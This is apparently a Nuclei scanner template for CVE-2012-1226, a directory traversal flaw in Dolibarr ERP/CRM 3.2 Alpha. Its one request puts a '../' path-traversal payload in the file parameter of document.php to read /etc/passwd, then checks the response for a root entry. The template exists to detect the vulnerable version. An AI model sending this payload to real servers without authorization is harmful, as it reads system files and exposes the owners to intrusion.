27 lines
871 B
YAML
27 lines
871 B
YAML
|
id: CVE-2012-1226
|
||
|
|
||
|
info:
|
||
|
name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
|
||
|
author: daffainfo
|
||
|
severity: high
|
||
|
description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.
|
||
|
reference:
|
||
|
- https://www.exploit-db.com/exploits/36873
|
||
|
- https://www.cvedetails.com/cve/CVE-2012-1226
|
||
|
tags: cve,cve2012,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|